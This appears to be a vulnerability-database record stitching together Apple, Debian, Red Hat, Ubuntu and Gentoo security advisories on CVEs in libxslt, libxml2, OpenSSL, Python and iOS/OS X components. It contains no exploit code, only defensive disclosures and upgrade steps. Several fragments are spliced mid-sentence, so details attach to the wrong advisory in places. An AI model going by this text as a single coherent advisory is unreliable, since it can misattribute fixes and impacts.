Available for: OS X Yosemite v10.10 to v10.10.4
Impact: Remote attackers may be able to circumvent a time delay for
failed login attempts and conduct brute-force attacks
Description: An issue existed when processing keyboard-interactive
devices. This issue was addressed through improved authentication
request validation.
CVE-ID
CVE-2015-5600
OpenSSL
Available for: OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.5,
OS X Yosemite v10.10 to v10.10.4
Impact: Multiple vulnerabilities existed in OpenSSL versions prior
to 0.9.8zg, the most serious of which may allow a remote attacker to
cause a denial of service.
Description: Multiple vulnerabilities existed in OpenSSL versions
prior to 0.9.8zg. These were addressed by updating OpenSSL to version
0.9.8zg.
CVE-ID
CVE-2015-1788
CVE-2015-1789
CVE-2015-1790
CVE-2015-1791
CVE-2015-1792
perl
Available for: OS X Yosemite v10.10 to v10.10.4
Impact: Parsing a maliciously crafted regular expression may lead to
disclosure of unexpected application termination or arbitrary code
execution
Description: An integer underflow issue existed in the way Perl
parsed regular expressions. This issue was addressed through improved
memory handling.
CVE-ID
CVE-2013-7422
PostgreSQL
Available for: OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.5,
OS X Yosemite v10.10 to v10.10.4
Impact: An attacker may be able to cause unexpected application
termination or gain access to data without proper authentication
Description: Multiple issues existed in PostgreSQL 9.2.4. These
issues were addressed by updating PostgreSQL to 9.2.13.
CVE-ID
CVE-2014-0067
CVE-2014-8161
CVE-2015-0241
CVE-2015-0242
CVE-2015-0243
CVE-2015-0244
python
Available for: OS X Yosemite v10.10 to v10.10.4
Impact: Multiple vulnerabilities existed in Python 2.7.6, the most
serious of which may lead to arbitrary code execution
Description: Multiple vulnerabilities existed in Python versions
prior to 2.7.6. These were addressed by updating Python to version
2.7.10.
CVE-ID
CVE-2013-7040
CVE-2013-7338
CVE-2014-1912
CVE-2014-7185
CVE-2014-9365
QL Office
Available for: OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.5,
OS X Yosemite v10.10 to v10.10.4
Impact: Parsing a maliciously crafted Office document may lead to an
unexpected application termination or arbitrary code execution
Description: A memory corruption issue existed in parsing of Office
documents. This issue was addressed through improved memory handling.
CVE-ID
CVE-2015-5773 : Apple
QL Office
Available for: OS X Yosemite v10.10 to v10.10.4
Impact: Parsing a maliciously crafted XML file may lead to
disclosure of user information
Description: An external entity reference issue existed in XML file
parsing. This issue was addressed through improved parsing.
CVE-ID
CVE-2015-3784 : Bruno Morisson of INTEGRITY S.A.
Quartz Composer Framework
Available for: OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.5,
OS X Yosemite v10.10 to v10.10.4
Impact: Parsing a maliciously crafted QuickTime file may lead to an
unexpected application termination or arbitrary code execution
Description: A memory corruption issue existed in parsing of
QuickTime files. This issue was addressed through improved memory
handling.
CVE-ID
CVE-2015-5771 : Apple
Quick Look
Available for: OS X Yosemite v10.10 to v10.10.4
Impact: Searching for a previously viewed website may launch the web
browser and render that website
Description: An issue existed where QuickLook had the capability to
execute JavaScript. The issue was addressed by disallowing execution
of JavaScript.
CVE-ID
CVE-2015-3781 : Andrew Pouliot of Facebook, Anto Loyola of Qubole
QuickTime 7
Available for: OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.5,
OS X Yosemite v10.10 to v10.10.4
Impact: Processing a maliciously crafted file may lead to an
unexpected application termination or arbitrary code execution
Description: Multiple memory corruption issues existed in QuickTime.
These issues were addressed through improved memory handling.
CVE-ID
CVE-2015-3772
CVE-2015-3779
CVE-2015-5753 : Apple
CVE-2015-5779 : Apple
QuickTime 7
Available for: OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.5,
OS X Yosemite v10.10 to v10.10.4
Impact: Processing a maliciously crafted file may lead to an
unexpected application termination or arbitrary code execution
Description: Multiple memory corruption issues existed in QuickTime.
These issues were addressed through improved memory handling.
CVE-ID
CVE-2015-3765 : Joe Burnett of Audio Poison
CVE-2015-3788 : Ryan Pentney and Richard Johnson of Cisco Talos
CVE-2015-3789 : Ryan Pentney and Richard Johnson of Cisco Talos
CVE-2015-3790 : Ryan Pentney and Richard Johnson of Cisco Talos
CVE-2015-3791 : Ryan Pentney and Richard Johnson of Cisco Talos
CVE-2015-3792 : Ryan Pentney and Richard Johnson of Cisco Talos
CVE-2015-5751 : WalkerFuz
SceneKit
Available for: OS X Yosemite v10.10 to v10.10.4
Impact: Viewing a maliciously crafted Collada file may lead to
arbitrary code execution
Description: A heap buffer overflow existed in SceneKit's handling
of Collada files. This issue was addressed through improved input
validation.
CVE-ID
CVE-2015-5772 : Apple
SceneKit
Available for: OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.5,
OS X Yosemite v10.10 to v10.10.4
Impact: A remote attacker may be able to cause unexpected
application termination or arbitrary code execution
Description: A memory corruption issue existed in SceneKit. This
issue was addressed through improved memory handling.
CVE-ID
CVE-2015-3783 : Haris Andrianakis of Google Security Team
Security
Available for: OS X Yosemite v10.10 to v10.10.4
Impact: A standard user may be able to gain access to admin
privileges without proper authentication
Description: An issue existed in handling of user authentication.
This issue was addressed through improved authentication checks.
CVE-ID
CVE-2015-3775 : [Eldon Ahrold]
SMBClient
Available for: OS X Yosemite v10.10 to v10.10.4
Impact: A remote attacker may be able to cause unexpected
application termination or arbitrary code execution
Description: A memory corruption issue existed in the SMB client.
This issue was addressed through improved memory handling.
CVE-ID
CVE-2015-3773 : Ilja van Sprundel
Speech UI
Available for: OS X Yosemite v10.10 to v10.10.4
Impact: Parsing a maliciously crafted unicode string with speech
alerts enabled may lead to an unexpected application termination or
arbitrary code execution
Description: A memory corruption issue existed in handling of
Unicode strings. This issue was addressed by improved memory
handling.
CVE-ID
CVE-2015-3794 : Adam Greenbaum of Refinitive
sudo
Available for: OS X Yosemite v10.10 to v10.10.4
Impact: Multiple vulnerabilities existed in sudo versions prior to
1.7.10p9, the most serious of which may allow an attacker access to
arbitrary files
Description: Multiple vulnerabilities existed in sudo versions prior
to 1.7.10p9. These were addressed by updating sudo to version
1.7.10p9.
CVE-ID
CVE-2013-1775
CVE-2013-1776
CVE-2013-2776
CVE-2013-2777
CVE-2014-0106
CVE-2014-9680
tcpdump
Available for: OS X Yosemite v10.10 to v10.10.4
Impact: Multiple vulnerabilities existed in tcpdump 4.7.3, the most
serious of which may allow a remote attacker to cause a denial of
service.
Description: Multiple vulnerabilities existed in tcpdump versions
prior to 4.7.3. These were addressed by updating tcpdump to version
4.7.3.
CVE-ID
CVE-2014-8767
CVE-2014-8769
CVE-2014-9140
Text Formats
Available for: OS X Yosemite v10.10 to v10.10.4
Impact: Parsing a maliciously crafted text file may lead to
disclosure of user information
Description: An XML external entity reference issue existed with
TextEdit parsing. This issue was addressed through improved parsing.
CVE-ID
CVE-2015-3762 : Xiaoyong Wu of the Evernote Security Team
udf
Available for: OS X Yosemite v10.10 to v10.10.4
Impact: Processing a maliciously crafted DMG file may lead to an
unexpected application termination or arbitrary code execution with
system privileges
Description: A memory corruption issue existed in parsing of
malformed DMG images. This issue was addressed through improved
memory handling.
CVE-ID
CVE-2015-3767 : beist of grayhash
OS X Yosemite v10.10.5 includes the security content of Safari 8.0.8:
https://support.apple.com/en-us/HT205033
OS X Yosemite 10.10.5 and Security Update 2015-006 may be obtained
from the Mac App Store or Apple's Software Downloads web site:
http://www.apple.com/support/downloads/
Information will also be posted to the Apple Security Updates
web site: https://support.apple.com/kb/HT201222
This message is signed with Apple's Product Security PGP key,
and details are available at:
https://www.apple.com/support/security/pgp/
-----BEGIN PGP SIGNATURE-----
iQIcBAEBCAAGBQJVzM3+AAoJEBcWfLTuOo7tx/YP/RTsUUx0UTk7rXj6AEcHmiR4
Y2xTUOXqRmxhieSbsGK9laKL5++lIzkGh5RC7oYag0+OgWtZz+EU/EtdoEJmGNJ6
+PgoEnizYdKhO1kos1KCHOwG6UFCqoeEm6Icm33nVUqWp7uAmhVRMRxtMJEScLSR
2LpsK0grIhFXtJGqu053TSKSCa1UTab8XWteZTT84uFGMSKbAFONj5CPIrR6+uev
QpVTwrnskPDBOXJwGhjypvIBTbt2aa1wjCukOAWFHwf7Pma/QUdhKRkUK4vAb9/k
fu2t2fBOvSMguJHRO+340NsQR9LvmdruBeAyNUH64srF1jtbAg0QnvZsPyO5aIyR
A8WrzHl3oIc0II0y7VpI+3o0J3Nn03EcBPtIKeoeyznnjNziDm72HPI2d2+5ZSRz
xjAd4Nmw+dgGq+UMkusIXgtRK4HcEpwzfImf3zqnKHakSncnFPhGKyNEgn8bK9a7
AeAvSqMXXsJg8weHUF2NLnAn/42k2wIE8d5BOLaIy13xz6MJn7VUI21pK0zCaGBF
sfkRFZP0eEVh8ZzU/nWp9E5KDpbsd72biJwvjWH4OrmkfzUWxStQiVwPTxtZD9LW
c5ZWe+vqZJV9eYRH2hAOMPaYkOQ5Z4DySNVVOFAG0eq9til8+V0k3L7ipIVd2XUB
msu6gVP8uZhFYNb8byVJ
=+0e/
-----END PGP SIGNATURE-----
.
For the stable distribution (wheezy), these problems have been fixed in
version 2.7.3-6+deb7u2.
For the unstable distribution (sid), these problems have been fixed in
version 2.7.6-7.
A vulnerability was reported in Python's socket module, due to
a boundary error within the sock_recvfrom_into() function, which
could be exploited to cause a buffer overflow.
It was reported that a patch added to Python 3.2 caused a race
condition where a file created could be created with world read/write
permissions instead of the permissions dictated by the original umask
of the process. This could allow a local attacker that could win the
race to view and edit files created by a program using this call. Note
that prior versions of Python, including 2.x, do not include the
vulnerable _get_masked_mode() function that is used by os.makedirs()
when exist_ok is set to True (CVE-2014-2667).
Python are susceptible to arbitrary process memory reading by a user
or adversary due to a bug in the _json module caused by insufficient
bounds checking. The bug is caused by allowing the user to supply a
negative value that is used an an array index, causing the scanstring
function to access process memory outside of the string it is intended
to access (CVE-2014-4616).
The CGIHTTPServer Python module does not properly handle URL-encoded
path separators in URLs. The verification
of md5 checksums and GPG signatures is performed automatically for you |
|
var-201208-0344
|
libxml2 2.9.0-rc1 and earlier, as used in Google Chrome before 21.0.1180.89, does not properly support a cast of an unspecified variable during handling of XSL transforms, which allows remote attackers to cause a denial of service or possibly have unknown other impact via a crafted document, related to the _xmlNs data structure in include/libxml/tree.h. An
attacker with a privileged network position may inject arbitrary
contents. This issue was addressed by using an encrypted HTTPS
connection to retrieve tutorials. Summary:
Updated libxslt packages that fix several security issues are now available
for Red Hat Enterprise Linux 5 and 6.
The Red Hat Security Response Team has rated this update as having
important security impact. Common Vulnerability Scoring System (CVSS) base
scores, which give detailed severity ratings, are available for each
vulnerability from the CVE links in the References section.
2. Relevant releases/architectures:
RHEL Desktop Workstation (v. 5 client) - i386, x86_64
Red Hat Enterprise Linux (v. 5 server) - i386, ia64, ppc, s390x, x86_64
Red Hat Enterprise Linux Desktop (v. 5 client) - i386, x86_64
Red Hat Enterprise Linux Desktop (v. 6) - i386, x86_64
Red Hat Enterprise Linux Desktop Optional (v. 6) - i386, x86_64
Red Hat Enterprise Linux HPC Node (v. 6) - x86_64
Red Hat Enterprise Linux HPC Node Optional (v. 6) - x86_64
Red Hat Enterprise Linux Server (v. 6) - i386, ppc64, s390x, x86_64
Red Hat Enterprise Linux Server Optional (v. 6) - i386, ppc64, s390x, x86_64
Red Hat Enterprise Linux Workstation (v. 6) - i386, x86_64
Red Hat Enterprise Linux Workstation Optional (v. 6) - i386, x86_64
3. Description:
libxslt is a library for transforming XML files into other textual formats
(including HTML, plain text, and other XML representations of the
underlying data) using the standard XSLT stylesheet transformation
mechanism.
A heap-based buffer overflow flaw was found in the way libxslt applied
templates to nodes selected by certain namespaces. An attacker could use
this flaw to create a malicious XSL file that, when used by an application
linked against libxslt to perform an XSL transformation, could cause the
application to crash or, possibly, execute arbitrary code with the
privileges of the user running the application. (CVE-2012-2871)
Several denial of service flaws were found in libxslt. An attacker could
use these flaws to create a malicious XSL file that, when used by an
application linked against libxslt to perform an XSL transformation, could
cause the application to crash. (CVE-2012-2825, CVE-2012-2870,
CVE-2011-3970)
An information leak could occur if an application using libxslt processed
an untrusted XPath expression, or used a malicious XSL file to perform an
XSL transformation. If combined with other flaws, this leak could possibly
help an attacker bypass intended memory corruption protections.
(CVE-2011-1202)
All libxslt users are advised to upgrade to these updated packages, which
contain backported patches to resolve these issues. All running
applications linked against libxslt must be restarted for this update to
take effect.
4.
This update is available via the Red Hat Network. Details on how to
use the Red Hat Network to apply this update are available at
https://access.redhat.com/knowledge/articles/11258
5. Bugs fixed (http://bugzilla.redhat.com/):
684386 - CVE-2011-1202 libxslt: Heap address leak in XLST
788826 - CVE-2011-3970 libxslt: Out-of-bounds read when parsing certain patterns
835982 - CVE-2012-2825 libxslt: DoS when reading unexpected DTD nodes in XSLT
852935 - CVE-2012-2871 libxslt: Heap-buffer overflow caused by bad cast in XSL transforms
852937 - CVE-2012-2870 libxslt: Use-after-free when processing an invalid XPath expression
6. Package List:
Red Hat Enterprise Linux Desktop (v. 5 client):
Source:
ftp://ftp.redhat.com/pub/redhat/linux/enterprise/5Client/en/os/SRPMS/libxslt-1.1.17-4.el5_8.3.src.rpm
i386:
libxslt-1.1.17-4.el5_8.3.i386.rpm
libxslt-debuginfo-1.1.17-4.el5_8.3.i386.rpm
libxslt-python-1.1.17-4.el5_8.3.i386.rpm
x86_64:
libxslt-1.1.17-4.el5_8.3.i386.rpm
libxslt-1.1.17-4.el5_8.3.x86_64.rpm
libxslt-debuginfo-1.1.17-4.el5_8.3.i386.rpm
libxslt-debuginfo-1.1.17-4.el5_8.3.x86_64.rpm
libxslt-python-1.1.17-4.el5_8.3.x86_64.rpm
RHEL Desktop Workstation (v. 5 client):
Source:
ftp://ftp.redhat.com/pub/redhat/linux/enterprise/5Client/en/os/SRPMS/libxslt-1.1.17-4.el5_8.3.src.rpm
i386:
libxslt-debuginfo-1.1.17-4.el5_8.3.i386.rpm
libxslt-devel-1.1.17-4.el5_8.3.i386.rpm
x86_64:
libxslt-debuginfo-1.1.17-4.el5_8.3.i386.rpm
libxslt-debuginfo-1.1.17-4.el5_8.3.x86_64.rpm
libxslt-devel-1.1.17-4.el5_8.3.i386.rpm
libxslt-devel-1.1.17-4.el5_8.3.x86_64.rpm
Red Hat Enterprise Linux (v. 5 server):
Source:
ftp://ftp.redhat.com/pub/redhat/linux/enterprise/5Server/en/os/SRPMS/libxslt-1.1.17-4.el5_8.3.src.rpm
i386:
libxslt-1.1.17-4.el5_8.3.i386.rpm
libxslt-debuginfo-1.1.17-4.el5_8.3.i386.rpm
libxslt-devel-1.1.17-4.el5_8.3.i386.rpm
libxslt-python-1.1.17-4.el5_8.3.i386.rpm
ia64:
libxslt-1.1.17-4.el5_8.3.i386.rpm
libxslt-1.1.17-4.el5_8.3.ia64.rpm
libxslt-debuginfo-1.1.17-4.el5_8.3.i386.rpm
libxslt-debuginfo-1.1.17-4.el5_8.3.ia64.rpm
libxslt-devel-1.1.17-4.el5_8.3.ia64.rpm
libxslt-python-1.1.17-4.el5_8.3.ia64.rpm
ppc:
libxslt-1.1.17-4.el5_8.3.ppc.rpm
libxslt-1.1.17-4.el5_8.3.ppc64.rpm
libxslt-debuginfo-1.1.17-4.el5_8.3.ppc.rpm
libxslt-debuginfo-1.1.17-4.el5_8.3.ppc64.rpm
libxslt-devel-1.1.17-4.el5_8.3.ppc.rpm
libxslt-devel-1.1.17-4.el5_8.3.ppc64.rpm
libxslt-python-1.1.17-4.el5_8.3.ppc.rpm
s390x:
libxslt-1.1.17-4.el5_8.3.s390.rpm
libxslt-1.1.17-4.el5_8.3.s390x.rpm
libxslt-debuginfo-1.1.17-4.el5_8.3.s390.rpm
libxslt-debuginfo-1.1.17-4.el5_8.3.s390x.rpm
libxslt-devel-1.1.17-4.el5_8.3.s390.rpm
libxslt-devel-1.1.17-4.el5_8.3.s390x.rpm
libxslt-python-1.1.17-4.el5_8.3.s390x.rpm
x86_64:
libxslt-1.1.17-4.el5_8.3.i386.rpm
libxslt-1.1.17-4.el5_8.3.x86_64.rpm
libxslt-debuginfo-1.1.17-4.el5_8.3.i386.rpm
libxslt-debuginfo-1.1.17-4.el5_8.3.x86_64.rpm
libxslt-devel-1.1.17-4.el5_8.3.i386.rpm
libxslt-devel-1.1.17-4.el5_8.3.x86_64.rpm
libxslt-python-1.1.17-4.el5_8.3.x86_64.rpm
Red Hat Enterprise Linux Desktop (v. 6):
Source:
ftp://ftp.redhat.com/pub/redhat/linux/enterprise/6Client/en/os/SRPMS/libxslt-1.1.26-2.el6_3.1.src.rpm
i386:
libxslt-1.1.26-2.el6_3.1.i686.rpm
libxslt-debuginfo-1.1.26-2.el6_3.1.i686.rpm
x86_64:
libxslt-1.1.26-2.el6_3.1.i686.rpm
libxslt-1.1.26-2.el6_3.1.x86_64.rpm
libxslt-debuginfo-1.1.26-2.el6_3.1.i686.rpm
libxslt-debuginfo-1.1.26-2.el6_3.1.x86_64.rpm
Red Hat Enterprise Linux Desktop Optional (v. 6):
Source:
ftp://ftp.redhat.com/pub/redhat/linux/enterprise/6Client/en/os/SRPMS/libxslt-1.1.26-2.el6_3.1.src.rpm
i386:
libxslt-debuginfo-1.1.26-2.el6_3.1.i686.rpm
libxslt-devel-1.1.26-2.el6_3.1.i686.rpm
libxslt-python-1.1.26-2.el6_3.1.i686.rpm
x86_64:
libxslt-debuginfo-1.1.26-2.el6_3.1.i686.rpm
libxslt-debuginfo-1.1.26-2.el6_3.1.x86_64.rpm
libxslt-devel-1.1.26-2.el6_3.1.i686.rpm
libxslt-devel-1.1.26-2.el6_3.1.x86_64.rpm
libxslt-python-1.1.26-2.el6_3.1.x86_64.rpm
Red Hat Enterprise Linux HPC Node (v. 6):
Source:
ftp://ftp.redhat.com/pub/redhat/linux/enterprise/6ComputeNode/en/os/SRPMS/libxslt-1.1.26-2.el6_3.1.src.rpm
x86_64:
libxslt-1.1.26-2.el6_3.1.i686.rpm
libxslt-1.1.26-2.el6_3.1.x86_64.rpm
libxslt-debuginfo-1.1.26-2.el6_3.1.i686.rpm
libxslt-debuginfo-1.1.26-2.el6_3.1.x86_64.rpm
Red Hat Enterprise Linux HPC Node Optional (v. 6):
Source:
ftp://ftp.redhat.com/pub/redhat/linux/enterprise/6ComputeNode/en/os/SRPMS/libxslt-1.1.26-2.el6_3.1.src.rpm
x86_64:
libxslt-debuginfo-1.1.26-2.el6_3.1.i686.rpm
libxslt-debuginfo-1.1.26-2.el6_3.1.x86_64.rpm
libxslt-devel-1.1.26-2.el6_3.1.i686.rpm
libxslt-devel-1.1.26-2.el6_3.1.x86_64.rpm
libxslt-python-1.1.26-2.el6_3.1.x86_64.rpm
Red Hat Enterprise Linux Server (v. 6):
Source:
ftp://ftp.redhat.com/pub/redhat/linux/enterprise/6Server/en/os/SRPMS/libxslt-1.1.26-2.el6_3.1.src.rpm
i386:
libxslt-1.1.26-2.el6_3.1.i686.rpm
libxslt-debuginfo-1.1.26-2.el6_3.1.i686.rpm
libxslt-devel-1.1.26-2.el6_3.1.i686.rpm
ppc64:
libxslt-1.1.26-2.el6_3.1.ppc.rpm
libxslt-1.1.26-2.el6_3.1.ppc64.rpm
libxslt-debuginfo-1.1.26-2.el6_3.1.ppc.rpm
libxslt-debuginfo-1.1.26-2.el6_3.1.ppc64.rpm
libxslt-devel-1.1.26-2.el6_3.1.ppc.rpm
libxslt-devel-1.1.26-2.el6_3.1.ppc64.rpm
s390x:
libxslt-1.1.26-2.el6_3.1.s390.rpm
libxslt-1.1.26-2.el6_3.1.s390x.rpm
libxslt-debuginfo-1.1.26-2.el6_3.1.s390.rpm
libxslt-debuginfo-1.1.26-2.el6_3.1.s390x.rpm
libxslt-devel-1.1.26-2.el6_3.1.s390.rpm
libxslt-devel-1.1.26-2.el6_3.1.s390x.rpm
x86_64:
libxslt-1.1.26-2.el6_3.1.i686.rpm
libxslt-1.1.26-2.el6_3.1.x86_64.rpm
libxslt-debuginfo-1.1.26-2.el6_3.1.i686.rpm
libxslt-debuginfo-1.1.26-2.el6_3.1.x86_64.rpm
libxslt-devel-1.1.26-2.el6_3.1.i686.rpm
libxslt-devel-1.1.26-2.el6_3.1.x86_64.rpm
Red Hat Enterprise Linux Server Optional (v. 6):
Source:
ftp://ftp.redhat.com/pub/redhat/linux/enterprise/6Server/en/os/SRPMS/libxslt-1.1.26-2.el6_3.1.src.rpm
i386:
libxslt-debuginfo-1.1.26-2.el6_3.1.i686.rpm
libxslt-python-1.1.26-2.el6_3.1.i686.rpm
ppc64:
libxslt-debuginfo-1.1.26-2.el6_3.1.ppc64.rpm
libxslt-python-1.1.26-2.el6_3.1.ppc64.rpm
s390x:
libxslt-debuginfo-1.1.26-2.el6_3.1.s390x.rpm
libxslt-python-1.1.26-2.el6_3.1.s390x.rpm
x86_64:
libxslt-debuginfo-1.1.26-2.el6_3.1.x86_64.rpm
libxslt-python-1.1.26-2.el6_3.1.x86_64.rpm
Red Hat Enterprise Linux Workstation (v. 6):
Source:
ftp://ftp.redhat.com/pub/redhat/linux/enterprise/6Workstation/en/os/SRPMS/libxslt-1.1.26-2.el6_3.1.src.rpm
i386:
libxslt-1.1.26-2.el6_3.1.i686.rpm
libxslt-debuginfo-1.1.26-2.el6_3.1.i686.rpm
libxslt-devel-1.1.26-2.el6_3.1.i686.rpm
x86_64:
libxslt-1.1.26-2.el6_3.1.i686.rpm
libxslt-1.1.26-2.el6_3.1.x86_64.rpm
libxslt-debuginfo-1.1.26-2.el6_3.1.i686.rpm
libxslt-debuginfo-1.1.26-2.el6_3.1.x86_64.rpm
libxslt-devel-1.1.26-2.el6_3.1.i686.rpm
libxslt-devel-1.1.26-2.el6_3.1.x86_64.rpm
Red Hat Enterprise Linux Workstation Optional (v. 6):
Source:
ftp://ftp.redhat.com/pub/redhat/linux/enterprise/6Workstation/en/os/SRPMS/libxslt-1.1.26-2.el6_3.1.src.rpm
i386:
libxslt-debuginfo-1.1.26-2.el6_3.1.i686.rpm
libxslt-python-1.1.26-2.el6_3.1.i686.rpm
x86_64:
libxslt-debuginfo-1.1.26-2.el6_3.1.x86_64.rpm
libxslt-python-1.1.26-2.el6_3.1.x86_64.rpm
These packages are GPG signed by Red Hat for security. Our key and
details on how to verify the signature are available from
https://access.redhat.com/security/team/key/#package
7. References:
https://www.redhat.com/security/data/cve/CVE-2011-1202.html
https://www.redhat.com/security/data/cve/CVE-2011-3970.html
https://www.redhat.com/security/data/cve/CVE-2012-2825.html
https://www.redhat.com/security/data/cve/CVE-2012-2870.html
https://www.redhat.com/security/data/cve/CVE-2012-2871.html
https://access.redhat.com/security/updates/classification/#important
8. Contact:
The Red Hat security contact is <secalert@redhat.com>. More contact
details at https://access.redhat.com/security/team/contact/
Copyright 2012 Red Hat, Inc. The verification
of md5 checksums and GPG signatures is performed automatically for you.
All packages are signed by Mandriva for security. ============================================================================
Ubuntu Security Notice USN-1595-1
October 04, 2012
libxslt vulnerabilities
============================================================================
A security issue affects these releases of Ubuntu and its derivatives:
- Ubuntu 12.04 LTS
- Ubuntu 11.10
- Ubuntu 11.04
- Ubuntu 10.04 LTS
- Ubuntu 8.04 LTS
Summary:
Applications using libxslt could be made to crash or run programs as your
login if they processed a specially crafted file.
Software Description:
- libxslt: XSLT processing library
Details:
Chris Evans discovered that libxslt incorrectly handled generate-id XPath
functions. If a user or automated system were tricked into processing a
specially crafted XSLT document, a remote attacker could obtain potentially
sensitive information. This issue only affected Ubuntu 8.04 LTS, Ubuntu
10.04 LTS and Ubuntu 11.04. (CVE-2011-1202)
It was discovered that libxslt incorrectly parsed certain patterns. (CVE-2011-3970)
Nicholas Gregoire discovered that libxslt incorrectly handled unexpected
DTD nodes. (CVE-2012-2825)
Nicholas Gregoire discovered that libxslt incorrectly managed memory. (CVE-2012-2870)
Nicholas Gregoire discovered that libxslt incorrectly handled certain
transforms.
(CVE-2012-2871)
Cris Neckar discovered that libxslt incorrectly managed memory. (CVE-2012-2893)
Update instructions:
The problem can be corrected by updating your system to the following
package versions:
Ubuntu 12.04 LTS:
libxslt1.1 1.1.26-8ubuntu1.2
Ubuntu 11.10:
libxslt1.1 1.1.26-7ubuntu0.1
Ubuntu 11.04:
libxslt1.1 1.1.26-6ubuntu0.1
Ubuntu 10.04 LTS:
libxslt1.1 1.1.26-1ubuntu1.1
Ubuntu 8.04 LTS:
libxslt1.1 1.1.22-1ubuntu1.3
In general, a standard system update will make all the necessary changes.
For the stable distribution (squeeze), these problems have been fixed in
version 1.1.26-6+squeeze2.
For the unstable distribution (sid), these problems have been fixed in
version 1.1.26-14.
Background
==========
libxml2 is the XML C parser and toolkit developed for the Gnome
project.
Affected packages
=================
-------------------------------------------------------------------
Package / Vulnerable / Unaffected
-------------------------------------------------------------------
1 dev-libs/libxml2 < 2.9.1-r1 >= 2.9.1-r1
Description
===========
Multiple vulnerabilities have been discovered in libxml2. Please review
the CVE identifiers referenced below for details.
Workaround
==========
There is no known workaround at this time.
Resolution
==========
All libxml2 users should upgrade to the latest version:
# emerge --sync
# emerge --ask --oneshot --verbose ">=dev-libs/libxml2-2.9.1-r1"
References
==========
[ 1 ] CVE-2012-2871
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-2871
[ 2 ] CVE-2012-5134
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5134
[ 3 ] CVE-2013-0338
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0338
[ 4 ] CVE-2013-1664
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1664
[ 5 ] CVE-2013-1969
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1969
[ 6 ] CVE-2013-2877
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2877
Availability
============
This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:
http://security.gentoo.org/glsa/glsa-201311-06.xml
Concerns?
=========
Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users' machines is of utmost
importance to us. Any security concerns should be addressed to
security@gentoo.org or alternatively, you may file a bug at
https://bugs.gentoo.org.
License
=======
Copyright 2013 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).
The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.
http://creativecommons.org/licenses/by-sa/2.5
. -----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
APPLE-SA-2013-09-18-2 iOS 7
iOS 7 is now available and addresses the following:
Certificate Trust Policy
Available for: iPhone 4 and later,
iPod touch (5th generation) and later, iPad 2 and later
Impact: Root certificates have been updated
Description: Several certificates were added to or removed from the
list of system roots.
CoreGraphics
Available for: iPhone 4 and later,
iPod touch (5th generation) and later, iPad 2 and later
Impact: Viewing a maliciously crafted PDF file may lead to an
unexpected application termination or arbitrary code execution
Description: A buffer overflow existed in the handling of JBIG2
encoded data in PDF files. This issue was addressed through
additional bounds checking.
CVE-ID
CVE-2013-1025 : Felix Groebert of the Google Security Team
CoreMedia
Available for: iPhone 4 and later,
iPod touch (5th generation) and later, iPad 2 and later
Impact: Playing a maliciously crafted movie file may lead to an
unexpected application termination or arbitrary code execution
Description: A buffer overflow existed in the handling of Sorenson
encoded movie files. This issue was addressed through improved bounds
checking.
CVE-ID
CVE-2013-1019 : Tom Gallagher (Microsoft) & Paul Bates (Microsoft)
working with HP's Zero Day Initiative
Data Protection
Available for: iPhone 4 and later,
iPod touch (5th generation) and later, iPad 2 and later
Impact: Apps could bypass passcode-attempt restrictions
Description: A privilege separation issue existed in Data
Protection. An app within the third-party sandbox could repeatedly
attempt to determine the user's passcode regardless of the user's
"Erase Data" setting. This issue was addressed by requiring
additional entitlement checks.
CVE-ID
CVE-2013-0957 : Jin Han of the Institute for Infocomm Research
working with Qiang Yan and Su Mon Kywe of Singapore Management
University
Data Security
Available for: iPhone 4 and later,
iPod touch (5th generation) and later, iPad 2 and later
Impact: An attacker with a privileged network position may intercept
user credentials or other sensitive information
Description: TrustWave, a trusted root CA, has issued, and
subsequently revoked, a sub-CA certificate from one of its trusted
anchors. This sub-CA facilitated the interception of communications
secured by Transport Layer Security (TLS). This update added the
involved sub-CA certificate to OS X's list of untrusted certificates.
CVE-ID
CVE-2013-5134
dyld
Available for: iPhone 4 and later,
iPod touch (5th generation) and later, iPad 2 and later
Impact: An attacker who has arbitrary code execution on a device may
be able to persist code execution across reboots
Description: Multiple buffer overflows existed in dyld's
openSharedCacheFile() function. These issues were addressed through
improved bounds checking.
CVE-ID
CVE-2013-3950 : Stefan Esser
File Systems
Available for: iPhone 4 and later,
iPod touch (5th generation) and later, iPad 2 and later
Impact: An attacker who can mount a non-HFS filesystem may be able
to cause an unexpected system termination or arbitrary code execution
with kernel privileges
Description: A memory corruption issue existed in the handling of
AppleDouble files. This issue was addressed by removing support for
AppleDouble files.
CVE-ID
CVE-2013-3955 : Stefan Esser
ImageIO
Available for: iPhone 4 and later,
iPod touch (5th generation) and later, iPad 2 and later
Impact: Viewing a maliciously crafted PDF file may lead to an
unexpected application termination or arbitrary code execution
Description: A buffer overflow existed in the handling of JPEG2000
encoded data in PDF files. This issue was addressed through
additional bounds checking.
CVE-ID
CVE-2013-1026 : Felix Groebert of the Google Security Team
IOKit
Available for: iPhone 4 and later,
iPod touch (5th generation) and later, iPad 2 and later
Impact: Background applications could inject user interface events
into the foreground app
Description: It was possible for background applications to inject
user interface events into the foreground application using the task
completion or VoIP APIs. This issue was addressed by enforcing access
controls on foreground and background processes that handle interface
events.
CVE-ID
CVE-2013-5137 : Mackenzie Straight at Mobile Labs
IOKitUser
Available for: iPhone 4 and later,
iPod touch (5th generation) and later, iPad 2 and later
Impact: A malicious local application could cause an unexpected
system termination
Description: A null pointer dereference existed in IOCatalogue.
The issue was addressed through additional type checking.
CVE-ID
CVE-2013-5138 : Will Estes
IOSerialFamily
Available for: iPhone 4 and later,
iPod touch (5th generation) and later, iPad 2 and later
Impact: Executing a malicious application may result in arbitrary
code execution within the kernel
